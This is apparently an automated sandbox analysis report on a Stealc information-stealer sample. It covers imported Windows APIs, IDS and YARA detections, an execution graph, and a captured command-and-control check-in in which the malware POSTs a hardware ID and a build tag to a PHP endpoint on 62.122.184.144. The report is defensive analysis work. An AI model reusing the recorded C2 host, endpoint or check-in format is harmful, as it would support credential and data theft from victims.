                            KERNEL32.dllInterlockedDecrement, GetLogicalDriveStringsW, SetEnvironmentVariableW, SetVolumeMountPointW, GetTimeFormatA, GetTickCount, CreateNamedPipeW, LocalFlags, GetNumberFormatA, ClearCommBreak, GetConsoleAliasExesW, GetEnvironmentStrings, SetFileShortNameW, LoadLibraryW, _hread, GetCalendarInfoA, SetVolumeMountPointA, GetVersionExW, EnumSystemCodePagesA, CreateSemaphoreA, GetFileAttributesW, CreateProcessA, GetModuleFileNameW, CreateActCtxA, CreateJobObjectA, VerifyVersionInfoW, InterlockedExchange, EnumCalendarInfoW, GetLastError, GetCurrentDirectoryW, GetProcAddress, CopyFileA, SetComputerNameA, SetFileAttributesA, DefineDosDeviceA, GlobalFree, FindClose, LoadLibraryA, LocalAlloc, CreateHardLinkW, GetNumberFormatW, OpenEventA, FoldStringW, SetEnvironmentVariableA, GlobalWire, GetModuleFileNameA, EnumDateFormatsA, GetShortPathNameW, GetDiskFreeSpaceExA, ReadConsoleInputW, GetCurrentProcessId, DebugBreak, GetTempPathA, TlsFree, LCMapStringW, InterlockedIncrement, CommConfigDialogA, GetLocaleInfoA, EnumCalendarInfoA, SetFilePointer, GetStdHandle, GetComputerNameA, CreateFileA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, CloseHandle, FlushFileBuffers, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapReAlloc, HeapAlloc, GetStartupInfoW, RtlUnwind, RaiseException, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, HeapCreate, VirtualFree, VirtualAlloc, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, SetLastError, GetCurrentThreadId, HeapSize, ExitProcess, WriteFile, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetACP, GetOEMCP, IsValidCodePage, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, GetStringTypeA, GetStringTypeW, InitializeCriticalSectionAndSpinCount, SetStdHandle, GetLocaleInfoW, GetModuleHandleA, GetConsoleCP, GetConsoleMode
                            GDI32.dllCreateDCW, CreateCompatibleBitmap, GetCharWidth32A, GetCharWidthI
                            ADVAPI32.dllReadEventLogW
                            ole32.dllCoSuspendClassObjects
                            WINHTTP.dllWinHttpOpen, WinHttpCheckPlatform
                            MSIMG32.dllAlphaBlend
                            Language of compilation systemCountry where language is spokenMap
                            TamilIndia
                            TamilSri Lanka
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-10-10T09:08:26.233410+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.54970562.122.184.14480TCP
                            TimestampSource PortDest PortSource IPDest IP
                            Oct 10, 2024 09:08:25.147665024 CEST4970580192.168.2.562.122.184.144
                            Oct 10, 2024 09:08:25.152590036 CEST804970562.122.184.144192.168.2.5
                            Oct 10, 2024 09:08:25.152668953 CEST4970580192.168.2.562.122.184.144
                            Oct 10, 2024 09:08:25.152837038 CEST4970580192.168.2.562.122.184.144
                            Oct 10, 2024 09:08:25.157717943 CEST804970562.122.184.144192.168.2.5
                            Oct 10, 2024 09:08:25.868427992 CEST804970562.122.184.144192.168.2.5
                            Oct 10, 2024 09:08:25.868587017 CEST4970580192.168.2.562.122.184.144
                            Oct 10, 2024 09:08:25.871274948 CEST4970580192.168.2.562.122.184.144
                            Oct 10, 2024 09:08:25.876159906 CEST804970562.122.184.144192.168.2.5
                            Oct 10, 2024 09:08:26.233241081 CEST804970562.122.184.144192.168.2.5
                            Oct 10, 2024 09:08:26.233409882 CEST4970580192.168.2.562.122.184.144
                            Oct 10, 2024 09:08:31.237330914 CEST804970562.122.184.144192.168.2.5
                            Oct 10, 2024 09:08:31.237400055 CEST4970580192.168.2.562.122.184.144
                            Oct 10, 2024 09:08:44.339358091 CEST4970580192.168.2.562.122.184.144
                            • 62.122.184.144
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.54970562.122.184.144804148C:\Users\user\Desktop\OW2Pw3W81N.exe
                            TimestampBytes transferredDirectionData
                            Oct 10, 2024 09:08:25.152837038 CEST89OUTGET / HTTP/1.1
                            Host: 62.122.184.144
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 10, 2024 09:08:25.868427992 CEST203INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 07:08:25 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 10, 2024 09:08:25.871274948 CEST420OUTPOST /f88d87a7e087e100.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----CGDBFBGIDHCAAKEBAKFI
                            Host: 62.122.184.144
                            Content-Length: 219
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 34 46 31 33 39 37 44 39 41 30 45 31 38 34 35 31 35 30 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 2d 2d 0d 0a
                            Data Ascii: ------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="hwid"34F1397D9A0E1845150070------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="build"default5_pal------CGDBFBGIDHCAAKEBAKFI--
                            Oct 10, 2024 09:08:26.233241081 CEST210INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 07:08:25 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:03:08:24
                            Start date:10/10/2024
                            Path:C:\Users\user\Desktop\OW2Pw3W81N.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\OW2Pw3W81N.exe"
                            Imagebase:0x400000
                            File size:468'480 bytes
                            MD5 hash:E75F8E807DC1F52A4EA99CE19F8D9E9F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2255052204.000000000073D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2255028758.0000000000711000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2073023114.0000000002330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                            Reputation:low
                            Has exited:true

                            Target ID:4
                            Start time:03:08:25
                            Start date:10/10/2024
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1064
                            Imagebase:0x250000
                            File size:483'680 bytes
                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:7.1%
                              Dynamic/Decrypted Code Coverage:68.4%
                              Signature Coverage:12.7%
                              Total number of Nodes:1426
                              Total number of Limit Nodes:27
                              execution_graph 27870 409440 strlen malloc strcpy_s free std::exception::exception 27908 22e932a ??2@YAPAXI RaiseException allocator 27928 41ce48 LeaveCriticalSection __mtinitlocknum 27970 22f1525 strtok_s strtok_s lstrlen lstrcpy codecvt 27872 41b050 6 API calls 3 library calls 27910 22e9b37 9 API calls 27932 22f1c35 110 API calls 27973 406f60 memcpy 27874 41dc60 atexit 27975 410765 279 API calls 27875 22f6a0a ExitProcess 27933 417667 lstrcpy 27976 22fd106 41 API calls __amsg_exit 27830 22e0005 27835 22e092b GetPEB 27830->27835 27832 22e0030 27836 22e003c 27832->27836 27835->27832 27837 22e0049 27836->27837 27849 22e0e0f SetErrorMode SetErrorMode 27837->27849 27842 22e0265 27843 22e02ce VirtualProtect 27842->27843 27845 22e030b 27843->27845 27844 22e0439 VirtualFree 27848 22e04be LoadLibraryA 27844->27848 27845->27844 27847 22e08c7 27848->27847 27850 22e0223 27849->27850 27851 22e0d90 27850->27851 27852 22e0dad 27851->27852 27853 22e0dbb GetPEB 27852->27853 27854 22e0238 VirtualAlloc 27852->27854 27853->27854 27854->27842 27934 41b270 5 API calls 2 library calls 27879 22f15b3 18 API calls codecvt 27978 22ef567 56 API calls 27979 22efd67 152 API calls 27855 712b3c 27856 712b4b 27855->27856 27859 7132dc 27856->27859 27864 7132f7 27859->27864 27860 713300 CreateToolhelp32Snapshot 27861 71331c Module32First 27860->27861 27860->27864 27862 71332b 27861->27862 27865 712b54 27861->27865 27866 712f9b 27862->27866 27864->27860 27864->27861 27867 712fc6 27866->27867 27868 71300f 27867->27868 27869 712fd7 VirtualAlloc 27867->27869 27868->27868 27869->27868 27880 41bc11 71 API calls 2 library calls 27881 22fbe78 162 API calls 2 library calls 27882 22fcd97 170 API calls 2 library calls 27883 41ac2c 71 API calls 2 library calls 27884 22f3b7d 91 API calls 2 library calls 27885 22f6a40 6 API calls 27982 22f6d18 643 API calls 27940 22f102b strtok_s lstrlen lstrcpy 27941 22f6c57 689 API calls 27942 22f140b strtok_s 27944 22fd0af RtlLeaveCriticalSection type_info::_Type_info_dtor 27886 22f32ae 22 API calls 27887 4090c3 5 API calls allocator 27945 22f140b StrCmpCA strtok_s 27984 22fcd90 173 API calls 3 library calls 27985 41abd0 free moneypunct std::exception::_Tidy 27889 22e6ebc VirtualProtect 27947 22f04b7 88 API calls 27948 22f0cb6 30 API calls 27987 413916 91 API calls 2 library calls 27988 4183dc 15 API calls 27989 22fcd8f 6 API calls 2 library calls 27949 22f102b StrCmpCA strtok_s lstrlen lstrcpy 27990 22f118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27892 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27951 41ceea SetUnhandledExceptionFilter 27952 22f3823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 26409 4169f0 26452 402260 26409->26452 26426 417850 3 API calls 26427 416a30 26426->26427 26428 4178e0 3 API calls 26427->26428 26429 416a43 26428->26429 26585 41a9b0 26429->26585 26431 416a64 26432 41a9b0 4 API calls 26431->26432 26433 416a6b 26432->26433 26434 41a9b0 4 API calls 26433->26434 26435 416a72 26434->26435 26436 41a9b0 4 API calls 26435->26436 26437 416a79 26436->26437 26438 41a9b0 4 API calls 26437->26438 26439 416a80 26438->26439 26593 41a8a0 26439->26593 26441 416b0c 26597 416920 GetSystemTime 26441->26597 26442 416a89 26442->26441 26445 416ac2 OpenEventA 26442->26445 26447 416af5 CloseHandle Sleep 26445->26447 26448 416ad9 26445->26448 26450 416b0a 26447->26450 26451 416ae1 CreateEventA 26448->26451 26449 416b16 CloseHandle ExitProcess 26450->26442 26451->26441 26794 4045c0 17 API calls 26452->26794 26454 402274 26455 4045c0 34 API calls 26454->26455 26456 40228d 26455->26456 26457 4045c0 34 API calls 26456->26457 26458 4022a6 26457->26458 26459 4045c0 34 API calls 26458->26459 26460 4022bf 26459->26460 26461 4045c0 34 API calls 26460->26461 26462 4022d8 26461->26462 26463 4045c0 34 API calls 26462->26463 26464 4022f1 26463->26464 26465 4045c0 34 API calls 26464->26465 26466 40230a 26465->26466 26467 4045c0 34 API calls 26466->26467 26468 402323 26467->26468 26469 4045c0 34 API calls 26468->26469 26470 40233c 26469->26470 26471 4045c0 34 API calls 26470->26471 26472 402355 26471->26472 26473 4045c0 34 API calls 26472->26473 26474 40236e 26473->26474 26475 4045c0 34 API calls 26474->26475 26476 402387 26475->26476 26477 4045c0 34 API calls 26476->26477 26478 4023a0 26477->26478 26479 4045c0 34 API calls 26478->26479 26480 4023b9 26479->26480 26481 4045c0 34 API calls 26480->26481 26482 4023d2 26481->26482 26483 4045c0 34 API calls 26482->26483 26484 4023eb 26483->26484 26485 4045c0 34 API calls 26484->26485 26486 402404 26485->26486 26487 4045c0 34 API calls 26486->26487 26488 40241d 26487->26488 26489 4045c0 34 API calls 26488->26489 26490 402436 26489->26490 26491 4045c0 34 API calls 26490->26491 26492 40244f 26491->26492 26493 4045c0 34 API calls 26492->26493 26494 402468 26493->26494 26495 4045c0 34 API calls 26494->26495 26496 402481 26495->26496 26497 4045c0 34 API calls 26496->26497 26498 40249a 26497->26498 26499 4045c0 34 API calls 26498->26499 26500 4024b3 26499->26500 26501 4045c0 34 API calls 26500->26501 26502 4024cc 26501->26502 26503 4045c0 34 API calls 26502->26503 26504 4024e5 26503->26504 26505 4045c0 34 API calls 26504->26505 26506 4024fe 26505->26506 26507 4045c0 34 API calls 26506->26507 26508 402517 26507->26508 26509 4045c0 34 API calls 26508->26509 26510 402530 26509->26510 26511 4045c0 34 API calls 26510->26511 26512 402549 26511->26512 26513 4045c0 34 API calls 26512->26513 26514 402562 26513->26514 26515 4045c0 34 API calls 26514->26515 26516 40257b 26515->26516 26517 4045c0 34 API calls 26516->26517 26518 402594 26517->26518 26519 4045c0 34 API calls 26518->26519 26520 4025ad 26519->26520 26521 4045c0 34 API calls 26520->26521 26522 4025c6 26521->26522 26523 4045c0 34 API calls 26522->26523 26524 4025df 26523->26524 26525 4045c0 34 API calls 26524->26525 26526 4025f8 26525->26526 26527 4045c0 34 API calls 26526->26527 26528 402611 26527->26528 26529 4045c0 34 API calls 26528->26529 26530 40262a 26529->26530 26531 4045c0 34 API calls 26530->26531 26532 402643 26531->26532 26533 4045c0 34 API calls 26532->26533 26534 40265c 26533->26534 26535 4045c0 34 API calls 26534->26535 26536 402675 26535->26536 26537 4045c0 34 API calls 26536->26537 26538 40268e 26537->26538 26539 419860 26538->26539 26798 419750 GetPEB 26539->26798 26541 419868 26542 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26541->26542 26543 41987a 26541->26543 26544 419af4 GetProcAddress 26542->26544 26545 419b0d 26542->26545 26546 41988c 21 API calls 26543->26546 26544->26545 26547 419b46 26545->26547 26548 419b16 GetProcAddress GetProcAddress 26545->26548 26546->26542 26549 419b68 26547->26549 26550 419b4f GetProcAddress 26547->26550 26548->26547 26551 419b71 GetProcAddress 26549->26551 26552 419b89 26549->26552 26550->26549 26551->26552 26553 416a00 26552->26553 26554 419b92 GetProcAddress GetProcAddress 26552->26554 26555 41a740 26553->26555 26554->26553 26556 41a750 26555->26556 26557 416a0d 26556->26557 26558 41a77e lstrcpy 26556->26558 26559 4011d0 26557->26559 26558->26557 26560 4011e8 26559->26560 26561 401217 26560->26561 26562 40120f ExitProcess 26560->26562 26563 401160 GetSystemInfo 26561->26563 26564 401184 26563->26564 26565 40117c ExitProcess 26563->26565 26566 401110 GetCurrentProcess VirtualAllocExNuma 26564->26566 26567 401141 ExitProcess 26566->26567 26568 401149 26566->26568 26799 4010a0 VirtualAlloc 26568->26799 26571 401220 26803 4189b0 26571->26803 26574 40129a 26577 416770 GetUserDefaultLangID 26574->26577 26575 401292 ExitProcess 26576 401249 __aulldiv 26576->26574 26576->26575 26578 4167d3 GetUserDefaultLCID 26577->26578 26579 416792 26577->26579 26578->26426 26579->26578 26580 4167c1 ExitProcess 26579->26580 26581 4167a3 ExitProcess 26579->26581 26582 4167b7 ExitProcess 26579->26582 26583 4167cb ExitProcess 26579->26583 26584 4167ad ExitProcess 26579->26584 26805 41a710 26585->26805 26587 41a9c1 lstrlenA 26589 41a9e0 26587->26589 26588 41aa18 26806 41a7a0 26588->26806 26589->26588 26591 41a9fa lstrcpy lstrcatA 26589->26591 26591->26588 26592 41aa24 26592->26431 26594 41a8bb 26593->26594 26595 41a90b 26594->26595 26596 41a8f9 lstrcpy 26594->26596 26595->26442 26596->26595 26810 416820 26597->26810 26599 41698e 26600 416998 sscanf 26599->26600 26839 41a800 26600->26839 26602 4169aa SystemTimeToFileTime SystemTimeToFileTime 26603 4169e0 26602->26603 26604 4169ce 26602->26604 26606 415b10 26603->26606 26604->26603 26605 4169d8 ExitProcess 26604->26605 26607 415b1d 26606->26607 26608 41a740 lstrcpy 26607->26608 26609 415b2e 26608->26609 26841 41a820 lstrlenA 26609->26841 26612 41a820 2 API calls 26613 415b64 26612->26613 26614 41a820 2 API calls 26613->26614 26615 415b74 26614->26615 26845 416430 26615->26845 26618 41a820 2 API calls 26619 415b93 26618->26619 26620 41a820 2 API calls 26619->26620 26621 415ba0 26620->26621 26622 41a820 2 API calls 26621->26622 26623 415bad 26622->26623 26624 41a820 2 API calls 26623->26624 26625 415bf9 26624->26625 26854 4026a0 26625->26854 26633 415cc3 26634 416430 lstrcpy 26633->26634 26635 415cd5 26634->26635 26636 41a7a0 lstrcpy 26635->26636 26637 415cf2 26636->26637 26638 41a9b0 4 API calls 26637->26638 26639 415d0a 26638->26639 26640 41a8a0 lstrcpy 26639->26640 26641 415d16 26640->26641 26642 41a9b0 4 API calls 26641->26642 26643 415d3a 26642->26643 26644 41a8a0 lstrcpy 26643->26644 26645 415d46 26644->26645 26646 41a9b0 4 API calls 26645->26646 26647 415d6a 26646->26647 26648 41a8a0 lstrcpy 26647->26648 26649 415d76 26648->26649 26650 41a740 lstrcpy 26649->26650 26651 415d9e 26650->26651 27580 417500 GetWindowsDirectoryA 26651->27580 26654 41a7a0 lstrcpy 26655 415db8 26654->26655 27590 404880 26655->27590 26657 415dbe 27735 4117a0 26657->27735 26659 415dc6 26660 41a740 lstrcpy 26659->26660 26661 415de9 26660->26661 26662 401590 lstrcpy 26661->26662 26663 415dfd 26662->26663 27755 405960 39 API calls moneypunct 26663->27755 26665 415e03 27756 411050 strtok_s strtok_s lstrlenA lstrcpy 26665->27756 26667 415e0e 26668 41a740 lstrcpy 26667->26668 26669 415e32 26668->26669 26670 401590 lstrcpy 26669->26670 26671 415e46 26670->26671 27757 405960 39 API calls moneypunct 26671->27757 26673 415e4c 27758 410d90 7 API calls 26673->27758 26675 415e57 26676 41a740 lstrcpy 26675->26676 26677 415e79 26676->26677 26678 401590 lstrcpy 26677->26678 26679 415e8d 26678->26679 27759 405960 39 API calls moneypunct 26679->27759 26681 415e93 27760 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26681->27760 26683 415e9e 26684 401590 lstrcpy 26683->26684 26685 415eb5 26684->26685 27761 411a10 121 API calls 26685->27761 26687 415eba 26688 41a740 lstrcpy 26687->26688 26689 415ed6 26688->26689 27762 404fb0 8 API calls 26689->27762 26691 415edb 26692 401590 lstrcpy 26691->26692 26693 415f5b 26692->26693 27763 410740 292 API calls 26693->27763 26695 415f60 26696 41a740 lstrcpy 26695->26696 26697 415f86 26696->26697 26698 401590 lstrcpy 26697->26698 26699 415f9a 26698->26699 27764 405960 39 API calls moneypunct 26699->27764 26701 415fa0 27765 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26701->27765 26703 415fab 26704 401590 lstrcpy 26703->26704 26705 415feb 26704->26705 27766 401e80 67 API calls 26705->27766 26707 415ff0 26708 416000 26707->26708 26709 416092 26707->26709 26711 41a740 lstrcpy 26708->26711 26710 41a7a0 lstrcpy 26709->26710 26712 4160a5 26710->26712 26713 416020 26711->26713 26714 401590 lstrcpy 26712->26714 26715 401590 lstrcpy 26713->26715 26717 4160b9 26714->26717 26716 416034 26715->26716 27767 405960 39 API calls moneypunct 26716->27767 27770 405960 39 API calls moneypunct 26717->27770 26720 41603a 27768 4112d0 21 API calls moneypunct 26720->27768 26721 4160bf 27771 413560 36 API calls 26721->27771 26724 41608a 26727 41610b 26724->26727 26729 401590 lstrcpy 26724->26729 26725 416045 26726 401590 lstrcpy 26725->26726 26728 416085 26726->26728 26731 416130 26727->26731 26734 401590 lstrcpy 26727->26734 27769 413dc0 75 API calls 26728->27769 26733 4160e7 26729->26733 26732 416155 26731->26732 26735 401590 lstrcpy 26731->26735 26737 41617a 26732->26737 26742 401590 lstrcpy 26732->26742 27772 4140b0 64 API calls moneypunct 26733->27772 26738 41612b 26734->26738 26740 416150 26735->26740 26743 41619f 26737->26743 26744 401590 lstrcpy 26737->26744 27774 414780 116 API calls moneypunct 26738->27774 27775 414bb0 67 API calls moneypunct 26740->27775 26741 4160ec 26747 401590 lstrcpy 26741->26747 26748 416175 26742->26748 26745 4161c4 26743->26745 26750 401590 lstrcpy 26743->26750 26749 41619a 26744->26749 26752 4161e9 26745->26752 26758 401590 lstrcpy 26745->26758 26751 416106 26747->26751 27776 414d70 75 API calls 26748->27776 27777 414f40 69 API calls moneypunct 26749->27777 26756 4161bf 26750->26756 27773 415100 71 API calls 26751->27773 26754 416210 26752->26754 26759 401590 lstrcpy 26752->26759 26760 416220 26754->26760 26761 4162b3 26754->26761 27778 407710 125 API calls moneypunct 26756->27778 26763 4161e4 26758->26763 26764 416209 26759->26764 26766 41a740 lstrcpy 26760->26766 26765 41a7a0 lstrcpy 26761->26765 27779 415050 67 API calls moneypunct 26763->27779 27780 419010 54 API calls moneypunct 26764->27780 26769 4162c6 26765->26769 26770 416241 26766->26770 26771 401590 lstrcpy 26769->26771 26772 401590 lstrcpy 26770->26772 26773 4162da 26771->26773 26774 416255 26772->26774 27784 405960 39 API calls moneypunct 26773->27784 27781 405960 39 API calls moneypunct 26774->27781 26777 4162e0 27785 413560 36 API calls 26777->27785 26778 41625b 27782 4112d0 21 API calls moneypunct 26778->27782 26781 416266 26782 401590 lstrcpy 26781->26782 26783 4162a6 26782->26783 27783 413dc0 75 API calls 26783->27783 26784 41a7a0 lstrcpy 26786 4162fc 26784->26786 26787 401590 lstrcpy 26786->26787 26789 416310 26787->26789 26788 4162ab 26788->26784 27786 405960 39 API calls moneypunct 26789->27786 26791 41631c 26793 416338 26791->26793 27787 416630 9 API calls moneypunct 26791->27787 26793->26449 26795 404697 26794->26795 26796 4046ac 11 API calls 26795->26796 26797 40474f 6 API calls 26795->26797 26796->26795 26797->26454 26798->26541 26801 4010c2 moneypunct 26799->26801 26800 4010fd 26800->26571 26801->26800 26802 4010e2 VirtualFree 26801->26802 26802->26800 26804 401233 GlobalMemoryStatusEx 26803->26804 26804->26576 26805->26587 26807 41a7c2 26806->26807 26808 41a7ec 26807->26808 26809 41a7da lstrcpy 26807->26809 26808->26592 26809->26808 26811 41a740 lstrcpy 26810->26811 26812 416833 26811->26812 26813 41a9b0 4 API calls 26812->26813 26814 416845 26813->26814 26815 41a8a0 lstrcpy 26814->26815 26816 41684e 26815->26816 26817 41a9b0 4 API calls 26816->26817 26818 416867 26817->26818 26819 41a8a0 lstrcpy 26818->26819 26820 416870 26819->26820 26821 41a9b0 4 API calls 26820->26821 26822 41688a 26821->26822 26823 41a8a0 lstrcpy 26822->26823 26824 416893 26823->26824 26825 41a9b0 4 API calls 26824->26825 26826 4168ac 26825->26826 26827 41a8a0 lstrcpy 26826->26827 26828 4168b5 26827->26828 26829 41a9b0 4 API calls 26828->26829 26830 4168cf 26829->26830 26831 41a8a0 lstrcpy 26830->26831 26832 4168d8 26831->26832 26833 41a9b0 4 API calls 26832->26833 26834 4168f3 26833->26834 26835 41a8a0 lstrcpy 26834->26835 26836 4168fc 26835->26836 26837 41a7a0 lstrcpy 26836->26837 26838 416910 26837->26838 26838->26599 26840 41a812 26839->26840 26840->26602 26842 41a83f 26841->26842 26843 415b54 26842->26843 26844 41a87b lstrcpy 26842->26844 26843->26612 26844->26843 26846 41a8a0 lstrcpy 26845->26846 26847 416443 26846->26847 26848 41a8a0 lstrcpy 26847->26848 26849 416455 26848->26849 26850 41a8a0 lstrcpy 26849->26850 26851 416467 26850->26851 26852 41a8a0 lstrcpy 26851->26852 26853 415b86 26852->26853 26853->26618 26855 4045c0 34 API calls 26854->26855 26856 4026b4 26855->26856 26857 4045c0 34 API calls 26856->26857 26858 4026d7 26857->26858 26859 4045c0 34 API calls 26858->26859 26860 4026f0 26859->26860 26861 4045c0 34 API calls 26860->26861 26862 402709 26861->26862 26863 4045c0 34 API calls 26862->26863 26864 402736 26863->26864 26865 4045c0 34 API calls 26864->26865 26866 40274f 26865->26866 26867 4045c0 34 API calls 26866->26867 26868 402768 26867->26868 26869 4045c0 34 API calls 26868->26869 26870 402795 26869->26870 26871 4045c0 34 API calls 26870->26871 26872 4027ae 26871->26872 26873 4045c0 34 API calls 26872->26873 26874 4027c7 26873->26874 26875 4045c0 34 API calls 26874->26875 26876 4027e0 26875->26876 26877 4045c0 34 API calls 26876->26877 26878 4027f9 26877->26878 26879 4045c0 34 API calls 26878->26879 26880 402812 26879->26880 26881 4045c0 34 API calls 26880->26881 26882 40282b 26881->26882 26883 4045c0 34 API calls 26882->26883 26884 402844 26883->26884 26885 4045c0 34 API calls 26884->26885 26886 40285d 26885->26886 26887 4045c0 34 API calls 26886->26887 26888 402876 26887->26888 26889 4045c0 34 API calls 26888->26889 26890 40288f 26889->26890 26891 4045c0 34 API calls 26890->26891 26892 4028a8 26891->26892 26893 4045c0 34 API calls 26892->26893 26894 4028c1 26893->26894 26895 4045c0 34 API calls 26894->26895 26896 4028da 26895->26896 26897 4045c0 34 API calls 26896->26897 26898 4028f3 26897->26898 26899 4045c0 34 API calls 26898->26899 26900 40290c 26899->26900 26901 4045c0 34 API calls 26900->26901 26902 402925 26901->26902 26903 4045c0 34 API calls 26902->26903 26904 40293e 26903->26904 26905 4045c0 34 API calls 26904->26905 26906 402957 26905->26906 26907 4045c0 34 API calls 26906->26907 26908 402970 26907->26908 26909 4045c0 34 API calls 26908->26909 26910 402989 26909->26910 26911 4045c0 34 API calls 26910->26911 26912 4029a2 26911->26912 26913 4045c0 34 API calls 26912->26913 26914 4029bb 26913->26914 26915 4045c0 34 API calls 26914->26915 26916 4029d4 26915->26916 26917 4045c0 34 API calls 26916->26917 26918 4029ed 26917->26918 26919 4045c0 34 API calls 26918->26919 26920 402a06 26919->26920 26921 4045c0 34 API calls 26920->26921 26922 402a1f 26921->26922 26923 4045c0 34 API calls 26922->26923 26924 402a38 26923->26924 26925 4045c0 34 API calls 26924->26925 26926 402a51 26925->26926 26927 4045c0 34 API calls 26926->26927 26928 402a6a 26927->26928 26929 4045c0 34 API calls 26928->26929 26930 402a83 26929->26930 26931 4045c0 34 API calls 26930->26931 26932 402a9c 26931->26932 26933 4045c0 34 API calls 26932->26933 26934 402ab5 26933->26934 26935 4045c0 34 API calls 26934->26935 26936 402ace 26935->26936 26937 4045c0 34 API calls 26936->26937 26938 402ae7 26937->26938 26939 4045c0 34 API calls 26938->26939 26940 402b00 26939->26940 26941 4045c0 34 API calls 26940->26941 26942 402b19 26941->26942 26943 4045c0 34 API calls 26942->26943 26944 402b32 26943->26944 26945 4045c0 34 API calls 26944->26945 26946 402b4b 26945->26946 26947 4045c0 34 API calls 26946->26947 26948 402b64 26947->26948 26949 4045c0 34 API calls 26948->26949 26950 402b7d 26949->26950 26951 4045c0 34 API calls 26950->26951 26952 402b96 26951->26952 26953 4045c0 34 API calls 26952->26953 26954 402baf 26953->26954 26955 4045c0 34 API calls 26954->26955 26956 402bc8 26955->26956 26957 4045c0 34 API calls 26956->26957 26958 402be1 26957->26958 26959 4045c0 34 API calls 26958->26959 26960 402bfa 26959->26960 26961 4045c0 34 API calls 26960->26961 26962 402c13 26961->26962 26963 4045c0 34 API calls 26962->26963 26964 402c2c 26963->26964 26965 4045c0 34 API calls 26964->26965 26966 402c45 26965->26966 26967 4045c0 34 API calls 26966->26967 26968 402c5e 26967->26968 26969 4045c0 34 API calls 26968->26969 26970 402c77 26969->26970 26971 4045c0 34 API calls 26970->26971 26972 402c90 26971->26972 26973 4045c0 34 API calls 26972->26973 26974 402ca9 26973->26974 26975 4045c0 34 API calls 26974->26975 26976 402cc2 26975->26976 26977 4045c0 34 API calls 26976->26977 26978 402cdb 26977->26978 26979 4045c0 34 API calls 26978->26979 26980 402cf4 26979->26980 26981 4045c0 34 API calls 26980->26981 26982 402d0d 26981->26982 26983 4045c0 34 API calls 26982->26983 